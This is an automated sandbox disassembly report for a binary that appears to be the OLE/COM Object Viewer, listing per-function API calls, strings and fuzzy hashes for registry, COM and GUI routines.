SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 001FE268
SendMessageW.USER32(?,00001304,00000000,00000000), ref: 001FE277
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001FE28E
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001FE2A6
SendMessageW.USER32(?,00001304,00000000,00000000), ref: 001FE2BD
SendMessageW.USER32(?,0000133E,00000000,00000001), ref: 001FE2DE
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001FE30F
SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 001FE326
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001FE345
SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 001FE35C
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001FE372
SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 001FE389
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001FE3A6
SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 001FE3BD
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 001FE3D0
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 001FE3EB
RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?), ref: 001FE3FE

Part of subcall function 001FE466: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 001FE482
Part of subcall function 001FE466: #6211.MFC42U(00000005,?,?,?,?,?,001FE130,?,?), ref: 001FE49B
Part of subcall function 001FE466: SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 001FE4AA
Part of subcall function 001FE466: SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001FE4BE
Part of subcall function 001FE466: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 001FE4ED
Part of subcall function 001FE466: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 001FE504
Part of subcall function 001FE466: SendMessageW.USER32(?,0000133E,00000000,?), ref: 001FE528
Part of subcall function 001FE466: SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 001FE53B
Part of subcall function 001FE466: SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 001FE555
Part of subcall function 001FE466: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,001FE130,?,?), ref: 001FE569
Part of subcall function 001FE466: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,001FE130,?,?), ref: 001FE578

Strings

Launch Permissions, xrefs: 001FE33E
Activation, xrefs: 001FE36B
Implementation, xrefs: 001FE39F
Access Permissions, xrefs: 001FE308

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend$RedrawWindow$#6211$Version
String ID: Access Permissions$Activation$Implementation$Launch Permissions
API String ID: 3082685337-186467299
Opcode ID: b10c4156349bb0ebf7369efcfcb3f983614fe83a99bec88a8276ad229fdebd2c
Instruction ID: 446a9596874a23188d57f32d6cf7a1a06d5676e44a92fe51ccaa65f34ff7b4c7
Opcode Fuzzy Hash: b10c4156349bb0ebf7369efcfcb3f983614fe83a99bec88a8276ad229fdebd2c
Instruction Fuzzy Hash: D7513E30500649BFEB216B61EC4CEEBBAFDFB92B05F014418F66EA10B1DB756941CE60

Function 00204B81 Relevance: 44.0, APIs: 22, Strings: 3, Instructions: 277registryCOMMON

Download Yara Rule

APIs

#1662.MFC42U(85C979FC), ref: 00204CA5
GetUserDefaultLCID.KERNEL32(85C979FC), ref: 00204CAA
LoadRegTypeLib.OLEAUT32(-00000008,?,?,?,?), ref: 00204CDA
GetSystemDefaultLCID.KERNEL32 ref: 00204CF2
LoadRegTypeLib.OLEAUT32(-00000008,?,?,?,?), ref: 00204D3C
RegOpenKeyW.ADVAPI32(80000000,TypeLib,?), ref: 00204D69
StringFromGUID2.OLE32(-00000008,?,00000027), ref: 00204D84
RegOpenKeyW.ADVAPI32(?,?,?), ref: 00204D9B
memset.MSVCRT ref: 00204DB7
wnsprintfW.SHLWAPI ref: 00204DE0
RegOpenKeyW.ADVAPI32(?,?,?), ref: 00204DFD

Strings

TypeLib, xrefs: 00204D5F
LoadRegTypeLib(%s, %u, %u, %lu, ...) failed., xrefs: 00204F2D
%u.%u, xrefs: 00204DCF

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: Open$DefaultLoadType$#1662FromStringSystemUsermemsetwnsprintf
String ID: %u.%u$LoadRegTypeLib(%s, %u, %u, %lu, ...) failed.$TypeLib
API String ID: 2064963674-2378697407
Opcode ID: c77f188651e52d377999561a049526959937bde4419722689e77969f4aeff0ee
Instruction ID: 7536c55f969060ff7e5254fbe26f680400bce7c04a15f1b78d1f20b428fd430e
Opcode Fuzzy Hash: c77f188651e52d377999561a049526959937bde4419722689e77969f4aeff0ee
Instruction Fuzzy Hash: D7C10CB19142189FDB60EF64DC89BA9B7B8BF44305F0080A5FA0DE7192DB319E94DF19

Function 00205010 Relevance: 40.4, APIs: 16, Strings: 7, Instructions: 165COMMON

Download Yara Rule

APIs

Part of subcall function 00209137: CoFreeUnusedLibraries.OLE32(00204689,00000000,?), ref: 002091A2

#540.MFC42U(85C979FC,?,?,?,?,00210AE8,000000FF,?,00202E44,?,?,00000104), ref: 00205050
CoGetClassObject.OLE32(000000FC,85C979FC,00000000,001F9E3C,00000000,85C979FC,?,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 0020507D
CoGetClassObject.OLE32(000000FC,85C979FC,00000000,001F9E3C,00000000,85C979FC,?,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 0020509D
#860.MFC42U(CoGetClassObject failed.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 002050B4
#1262.MFC42U(00000000,CoGetClassObject failed.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 002050BC
#860.MFC42U(CoGetClassObject succeeded, but punk was NULL.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 002050CF
#1262.MFC42U(00000000,CoGetClassObject succeeded, but punk was NULL.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 002050D7
#860.MFC42U(QueryInterface on class factory for IClassFactory failed.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 00205118
#1262.MFC42U(00000000,QueryInterface on class factory for IClassFactory failed.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 00205120
#860.MFC42U(CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 00205136
#1262.MFC42U(00000000,CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 0020513E
#860.MFC42U(IClassFactory::CreateInstance failed.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 002051A6
#1262.MFC42U(00000000,IClassFactory::CreateInstance failed.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 002051AE
#860.MFC42U(IClassFactory::CreateInstance succeeded, but punk was NULL.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 002051C4
#1262.MFC42U(00000000,IClassFactory::CreateInstance succeeded, but punk was NULL.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 002051CC
#800.MFC42U(?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 00205256

Strings

CoGetClassObject failed., xrefs: 002050AC
IClassFactory::CreateInstance succeeded, but punk was NULL., xrefs: 002051BC
CoGetClassObject succeeded, but punk was NULL., xrefs: 002050C7
IClassFactory::CreateInstance failed., xrefs: 0020519E
QueryInterface on class factory for IClassFactory failed., xrefs: 00205110
D. , xrefs: 002050F5
CoGetClassObject succeeded, but pClassFactory was NULL., xrefs: 0020512E

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #1262#860$ClassObject$#540#800FreeLibrariesUnused
String ID: CoGetClassObject failed.$CoGetClassObject succeeded, but pClassFactory was NULL.$CoGetClassObject succeeded, but punk was NULL.$D. $IClassFactory::CreateInstance failed.$IClassFactory::CreateInstance succeeded, but punk was NULL.$QueryInterface on class factory for IClassFactory failed.
API String ID: 3706085179-3282552073
Opcode ID: 24cb269f054b6f38de1933595cc7d1e0b74b70987b03eb9cf0e3185d0afd39ab
Instruction ID: 1c8638a216db56793ea4411ac0c4d8294d6077f6c5cc3b00609fcc230be5e496
Opcode Fuzzy Hash: 24cb269f054b6f38de1933595cc7d1e0b74b70987b03eb9cf0e3185d0afd39ab
Instruction Fuzzy Hash: 3271AE75910209EFCF00EFA4D98ABAEBBB4FF18311F114025E911B72A2CB749A54CF60

Function 00201C95 Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 216registrycomstringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00201C9F
StringFromGUID2.OLE32(?,?,00000028,000002BC,00204FBE,00000000,001F9ECC,?), ref: 00201CCE
wsprintfW.USER32 ref: 00201CE4
RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00201D1A
lstrcpyW.KERNEL32(?,<no name>), ref: 00201D30
RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00201D9E
RegQueryValueW.ADVAPI32(80000002,?,?,000000A0), ref: 00201DEE
CLSIDFromString.OLE32(?,?), ref: 00201E06
#540.MFC42U ref: 00201E18
#2810.MFC42U(?,Could not convert the CLSID of the %s interface viewer.,?), ref: 00201E33
#800.MFC42U(?,00000000), ref: 00201E4E
#540.MFC42U ref: 00201E90
#2859.MFC42U(?,00000001), ref: 00201EB6
#800.MFC42U(00000000,?,00000001), ref: 00201ED3
CoCreateInstance.OLE32(?,00000000,00000001,001F1990,?), ref: 00201EEE
#2810.MFC42U(?,The %s interface viewer failed to load.,?), ref: 00201F91

Strings

The %s interface viewer failed to load., xrefs: 00201F8B
Could not convert the CLSID of the %s interface viewer., xrefs: 00201E2D
Interface\%s, xrefs: 00201CDE
Interface\%s\OLEViewerIViewerCLSID, xrefs: 00201D57
Software\Microsoft\IViewers\Interface\%s\OLEViewerIViewerCLSID, xrefs: 00201DAC
<no name>, xrefs: 00201D24

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: QueryValue$#2810#540#800FromString$#2859CreateH_prolog3_Instancelstrcpywsprintf
String ID: <no name>$Could not convert the CLSID of the %s interface viewer.$Interface\%s$Interface\%s\OLEViewerIViewerCLSID$Software\Microsoft\IViewers\Interface\%s\OLEViewerIViewerCLSID$The %s interface viewer failed to load.
API String ID: 3373394939-4261977633
Opcode ID: 47079be11c989af87a640cd69b4a4a207a5a269475ab10a324c760a6fda5b96e
Instruction ID: a790707dcbe9efa447e242535a76c0b31dfdb372fe4e17f2aba42daacad01081
Opcode Fuzzy Hash: 47079be11c989af87a640cd69b4a4a207a5a269475ab10a324c760a6fda5b96e
Instruction Fuzzy Hash: B2811D719103299BDB21EF90DC89AEEB3B9BF18300F4545E9E909E7191DB70AE94CF50

Function 001FD000 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 167windowregistrystringCOMMON

Download Yara Rule

APIs

#4704.MFC42U ref: 001FD024
LoadCursorW.USER32(00000000,00007F02), ref: 001FD030
SetCursor.USER32(00000000), ref: 001FD037
SendMessageW.USER32(?,00001061,00000000,?), ref: 001FD06F
SendMessageW.USER32(?,00001061,00000001,?), ref: 001FD0A0
RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 001FD0B3
RegEnumKeyW.ADVAPI32(?,00000000,?,00000100), ref: 001FD0D0
wsprintfW.USER32 ref: 001FD0F8
lstrcpyW.KERNEL32(?,001F2948,80000000,?,001F21A0,?,000001FE), ref: 001FD13F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 001FD18E
SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 001FD1BE
SendMessageW.USER32(?,0000104C,00000000,00000001), ref: 001FD1F3
LoadCursorW.USER32(00000000,00007F00), ref: 001FD205
SetCursor.USER32(00000000), ref: 001FD20C
SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 001FD23B
SendMessageW.USER32(?,0000104C,00000000,00000009), ref: 001FD263
#5977.MFC42U ref: 001FD26F
RegCloseKey.ADVAPI32(?), ref: 001FD27A

Strings

Class Name, xrefs: 001FD054
CLSID, xrefs: 001FD08B, 001FD0AD
CLSID\%s, xrefs: 001FD0F2

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend$Cursor$Load$#4704#5977CloseEnumOpenlstrcpywsprintf
String ID: CLSID$CLSID\%s$Class Name
API String ID: 3330777091-3884686139
Opcode ID: 2d02fd8419d19858405d00d6967ef59da8bc67ceaeed840a5955a996e0b79f8f
Instruction ID: ac6028b0a03a867451238135ae4922b8a411a886c3caf3c943aeb4dcbb656fa1
Opcode Fuzzy Hash: 2d02fd8419d19858405d00d6967ef59da8bc67ceaeed840a5955a996e0b79f8f
Instruction Fuzzy Hash: D36111B190021CAFEB209F60EC8DFEAB7BAFB54304F1045A5E61DA6191DB725E95CF10

Function 0020CB3B Relevance: 36.2, APIs: 24, Instructions: 181COMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,00000000,?,?,?,?,0020CB28,00000000,00000000,?), ref: 0020CB71
GetLastError.KERNEL32(?,?,?,0020CB28,00000000,00000000,?,?,?,0020CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020CB77
malloc.MSVCRT ref: 0020CB9D
GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,0020CB28,00000000,00000000,?,?,?,0020CE14,00000000,00000000), ref: 0020CBC1
GetLastError.KERNEL32(?,?,0020CB28,00000000,00000000,?,?,?,0020CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020CBCB
free.MSVCRT ref: 0020CD14
free.MSVCRT ref: 0020CD20
free.MSVCRT ref: 0020CD31

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: free$ErrorInformationLastToken$malloc
String ID:
API String ID: 3900411180-0
Opcode ID: e1d132f4ce551920808aa288c2d1fc6fe267c0cd62b0cfea59936473a4ab2719
Instruction ID: 08eb25cf7637776298966187c7aec95c29f153921e4966aa8e416cd3aa9c16e0
Opcode Fuzzy Hash: e1d132f4ce551920808aa288c2d1fc6fe267c0cd62b0cfea59936473a4ab2719
Instruction Fuzzy Hash: F951EAB6910227EFD714AF95EC4CAAABB74FF58311B328276FC05D7191DB308D109A90

Function 00206C29 Relevance: 35.4, APIs: 15, Strings: 5, Instructions: 415registrystringCOMMON

Download Yara Rule

APIs

#540.MFC42U(?,?), ref: 00206CF1
#2810.MFC42U(?,IMoniker::BindToObject failed on the file moniker created from ( "%s" ).,00000000,?,?), ref: 00206D15
#800.MFC42U(?,00000000), ref: 00206D39

Part of subcall function 00205010: #540.MFC42U(85C979FC,?,?,?,?,00210AE8,000000FF,?,00202E44,?,?,00000104), ref: 00205050
Part of subcall function 00205010: CoGetClassObject.OLE32(000000FC,85C979FC,00000000,001F9E3C,00000000,85C979FC,?,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 0020507D
Part of subcall function 00205010: #860.MFC42U(CoGetClassObject failed.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 002050B4
Part of subcall function 00205010: #1262.MFC42U(00000000,CoGetClassObject failed.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 002050BC
Part of subcall function 00205010: #860.MFC42U(CoGetClassObject succeeded, but punk was NULL.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 002050CF
Part of subcall function 00205010: #1262.MFC42U(00000000,CoGetClassObject succeeded, but punk was NULL.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 002050D7
Part of subcall function 00205010: #860.MFC42U(QueryInterface on class factory for IClassFactory failed.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 00205118
Part of subcall function 00205010: #1262.MFC42U(00000000,QueryInterface on class factory for IClassFactory failed.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 00205120
Part of subcall function 00205010: #860.MFC42U(CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 00205136
Part of subcall function 00205010: #1262.MFC42U(00000000,CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00210AE8,000000FF,?,00202E44,?), ref: 0020513E

RegOpenKeyW.ADVAPI32(80000000,Interface,?), ref: 00206E1F
malloc.MSVCRT ref: 00206E77
malloc.MSVCRT ref: 00206EBA
RegEnumKeyW.ADVAPI32(?,00000000,?,00000050), ref: 00206F38
CLSIDFromString.OLE32(00000000,00000000), ref: 00206F76
StringFromGUID2.OLE32(00000000,?,00000100), ref: 00207148
lstrcpyW.KERNEL32(?,00000000), ref: 0020717B
RegQueryValueW.ADVAPI32(?,?,?,00000200), ref: 002071A6
wsprintfW.USER32 ref: 002071D9
free.MSVCRT ref: 0020733B
free.MSVCRT ref: 0020734A
RegCloseKey.ADVAPI32(?), ref: 00207389

Strings

IMoniker::BindToObject failed on the file moniker created from ( "%s" )., xrefs: 00206D09
%s <no name>, xrefs: 002071CD
Interface, xrefs: 00206E15
l; , xrefs: 00206C74, 00206D58, 00206DB9
', xrefs: 00206DCF

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #1262#860$#540FromStringfreemalloc$#2810#800ClassCloseEnumObjectOpenQueryValuelstrcpywsprintf
String ID: %s <no name>$'$IMoniker::BindToObject failed on the file moniker created from ( "%s" ).$Interface$l;
API String ID: 3715769521-2548874848
Opcode ID: 6c15d9c0c7add155eaa78ccfbfb4678362a9109c19169f6fa16c9d2da8772fd4
Instruction ID: 696afc7c4a458fdaed1bfcf06cd219ba17084f8506b09611d34139d85d70d29e
Opcode Fuzzy Hash: 6c15d9c0c7add155eaa78ccfbfb4678362a9109c19169f6fa16c9d2da8772fd4
Instruction Fuzzy Hash: 1A22D8B0915329CFDB64DF14CD88BA9B7B9BB44305F1040D9E60AA7292DB74AED4CF18

Function 00200E70 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

#4493.MFC42U ref: 00200E90
__EH_prolog3_GS.LIBCMT ref: 00201B2B
#540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00201B35
#540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00201B41
#4155.MFC42U(00000004,00000044,00000000,?,?), ref: 00201B4F
#4155.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00201B59
#540.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00201B61
#3865.MFC42U(?,00000005,00000004,00000044,00000000,?,?), ref: 00201B77
#2970.MFC42U(00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00201B8C
#2910.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00201B99
#3792.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00201BA6
#3792.MFC42U(00000000,000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00201BB8
wsprintfW.USER32 ref: 00201BE8
#5568.MFC42U(000000FF), ref: 00201BF6
#6399.MFC42U(?,?,?,000000FF), ref: 00201C09
#800.MFC42U(?,?,?,000000FF), ref: 00201C11
#800.MFC42U(?,?,?,000000FF), ref: 00201C19
#800.MFC42U(?,?,?,000000FF), ref: 00201C21

Strings

,, xrefs: 00201B70
%d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, xrefs: 00201BE2

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #540#800$#3792#4155$#2910#2970#3865#4493#5568#6399H_prolog3_wsprintf
String ID: %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d$,
API String ID: 3591584436-2100854449
Opcode ID: d75fd27454d59029dc720669ba2259d74a7505430c04f2db336c50b7621039b7
Instruction ID: 80cb3a8250bd24417946c409ac58415d63a952786fe0c61d680ff8200101b321
Opcode Fuzzy Hash: d75fd27454d59029dc720669ba2259d74a7505430c04f2db336c50b7621039b7
Instruction Fuzzy Hash: 59310832921208AACF05EBE0CC56EEDBB75BF58310F444428F611A71E3DB716A6ADF51

Function 002042EB Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 280stringregistryCOMMON

Download Yara Rule

APIs

#1662.MFC42U(85C979FC), ref: 00204326
#858.MFC42U(?), ref: 00204531
#540.MFC42U ref: 0020455F
StringFromGUID2.OLE32(?,?,00000028,?,001F9EDC), ref: 0020459A
lstrcpyW.KERNEL32(?,00000000), ref: 002045B1
#2810.MFC42U(?,CLSID\%s,?,?), ref: 002045E0
lstrcpyW.KERNEL32(?,?), ref: 002045F3
RegQueryValueW.ADVAPI32(80000000,00000000,?,00000100), ref: 00204618
#2810.MFC42U(?,%s (%s),?,?), ref: 00204636
#2810.MFC42U(?,001F572C,?,?,001F9EDC), ref: 00204651
#540.MFC42U(00000000,?), ref: 002046F4
#2810.MFC42U(?,Could not add item to tree view. Internal OLEViewer error.,00000000,?), ref: 00204709
#800.MFC42U(?,80004005,00000000,?), ref: 0020472C
#2644.MFC42U(00000000,?), ref: 00204737
#800.MFC42U(00000000,?), ref: 0020476E

Strings

%s (%s), xrefs: 0020462A
Could not add item to tree view. Internal OLEViewer error., xrefs: 002046FD
CLSID\%s, xrefs: 002045D4

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #2810$#540#800lstrcpy$#1662#2644#858FromQueryStringValue
String ID: %s (%s)$CLSID\%s$Could not add item to tree view. Internal OLEViewer error.
API String ID: 2368693756-676685266
Opcode ID: 2901163c396c5d72e8b5ebd0d71765ccf7c2bc4a25b81c3c8acbcd4125a91989
Instruction ID: 2fd0cbc709ad19f1f665f93f62b0c7ae9e17921487abaabad889da29527201c7
Opcode Fuzzy Hash: 2901163c396c5d72e8b5ebd0d71765ccf7c2bc4a25b81c3c8acbcd4125a91989
Instruction Fuzzy Hash: E6D1D3759112299FDB64EF54CC99BEDB7B8BF18300F1081EAE509A72A1DB709E84CF50

Function 001FCB16 Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 126stringwindowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001FCB20
#540.MFC42U(00000264,001FDF79), ref: 001FCB33
StringFromGUID2.OLE32(?,?,00000028,00000264,001FDF79), ref: 001FCB5F
#861.MFC42U(?), ref: 001FCBEC
lstrcmpW.KERNEL32(?,Interactive User,?,?,?,?), ref: 001FCC3D
#6195.MFC42U(001F21A0,?,?,?,?), ref: 001FCC4E
#2634.MFC42U(00000000,001F21A0,?,?,?,?), ref: 001FCC58
#6195.MFC42U(?,?,?,?,?), ref: 001FCC69
#2634.MFC42U(00000001,?,?,?,?,?), ref: 001FCC72
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 001FCCA3
#6330.MFC42U(00000000,?,?,?,?), ref: 001FCCAC
#800.MFC42U(00000000,?,?,?,?), ref: 001FCCB7

Strings

RemoteServerName, xrefs: 001FCBBE
Interactive User, xrefs: 001FCC31
ActivateAtStorage, xrefs: 001FCB7D
RunAs, xrefs: 001FCC0F

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #2634#6195$#540#6330#800#861FromH_prolog3_MessageSendStringlstrcmp
String ID: ActivateAtStorage$Interactive User$RemoteServerName$RunAs
API String ID: 3025489585-4117267133
Opcode ID: 4bc0f625a79819ed2049d7e1cbf68eb9b6b257ae6c437420703cd724fee69580
Instruction ID: 3f555081a8625fe1d2bfc68b2faced929e3ed288f57022f3775351140aa8f59c
Opcode Fuzzy Hash: 4bc0f625a79819ed2049d7e1cbf68eb9b6b257ae6c437420703cd724fee69580
Instruction Fuzzy Hash: 4D41B33154430D9BDF11FF64CD8ABFB76B9AF05700F0104A9BA09AB1C2DBB16A848F50

Function 0020D91D Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0020D924
FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,0020B9B7,?,00000000,00000000,00000000), ref: 0020D942
#2810.MFC42U(?,%s %s,?,00000000,?), ref: 0020D96C
#922.MFC42U(?,?,?,?,?,?,?), ref: 0020D97F
#858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0020D98C
#800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0020D997
LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 0020D99F
#1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 0020D9AA
#540.MFC42U ref: 0020D94F

Part of subcall function 0020DCEB: wsprintfW.USER32 ref: 0020DD1D

#540.MFC42U ref: 0020D9B7
#2810.MFC42U(?,<No system message defined> %s,00000000,?), ref: 0020D9D5
#922.MFC42U(?,?,?,?,?,?), ref: 0020D9E8
#858.MFC42U(00000000,?,?,?,?,?,?), ref: 0020D9F5
